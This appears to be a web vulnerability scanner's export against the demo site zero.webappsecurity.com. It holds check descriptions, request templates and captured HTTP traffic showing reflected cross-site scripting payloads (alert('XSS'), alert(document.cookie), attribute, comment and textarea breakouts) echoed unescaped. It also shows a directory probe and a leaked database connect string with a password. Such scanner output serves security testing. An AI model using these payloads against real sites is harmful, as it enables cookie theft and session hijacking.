<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /_vti_txt/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:54 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Directory (_vti_txt)<B>Found Directory:</B> /_vti_txt
<BR<BR>This folder contains text indices for the WAIS search engine only. It is not used by Index Server on IIS.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /_vti_txt/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:54 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=test@<script>alert(document.cookie)</script>.com&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:51 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 397
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = test@<script>alert(document.cookie)</script>.com</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=<attack>test@<script>alert(document.cookie)</script>.com</attack>&txtLastName=Swinneytest@<script>alert\(document\.cookie\)GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>--><script>alert('XSS')</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=<attack>--><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=>"><script>alert("XSS")</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=<attack>>"><script>alert("XSS")</script></attack>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /forgot2.asp?msg2=no&msg=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1854
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"></textarea><script>alert('XSS')</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
